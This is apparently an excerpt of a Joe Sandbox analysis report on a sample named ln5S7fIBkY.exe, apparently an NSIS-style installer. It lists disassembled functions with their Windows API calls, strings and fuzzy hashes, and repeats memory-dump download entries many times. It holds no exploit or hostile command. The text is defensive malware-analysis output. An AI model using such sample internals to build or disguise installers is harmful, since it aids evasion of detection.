Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4

Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27

Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
wsprintfA.USER32 ref: 00405F62
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
GlobalFree.KERNEL32(00000000), ref: 0040604B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052

Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

Strings

%ls=%ls, xrefs: 00405F58
[Rename], xrefs: 00405FCC, 00405FDE

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD

Function 0040652B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040652C, 00406531
*?|<>/":, xrefs: 0040657D
"C:\Users\user\Desktop\ln5S7fIBkY.exe", xrefs: 0040652B

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3649173787
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD

Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404292
GetSysColor.USER32(00000000), ref: 004042D0
SetTextColor.GDI32(?,00000000), ref: 004042DC
SetBkMode.GDI32(?,?), ref: 004042E8
GetSysColor.USER32(?), ref: 004042FB
SetBkColor.GDI32(?,?), ref: 0040430B
DeleteObject.GDI32(?), ref: 00404325
CreateBrushIndirect.GDI32(?), ref: 0040432F

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58

Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
GetMessagePos.USER32 ref: 00404BEC
ScreenToClient.USER32(?,?), ref: 00404C06
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E

Strings

f, xrefs: 00404C1A

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(000A5018,00000064,000A5A08), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
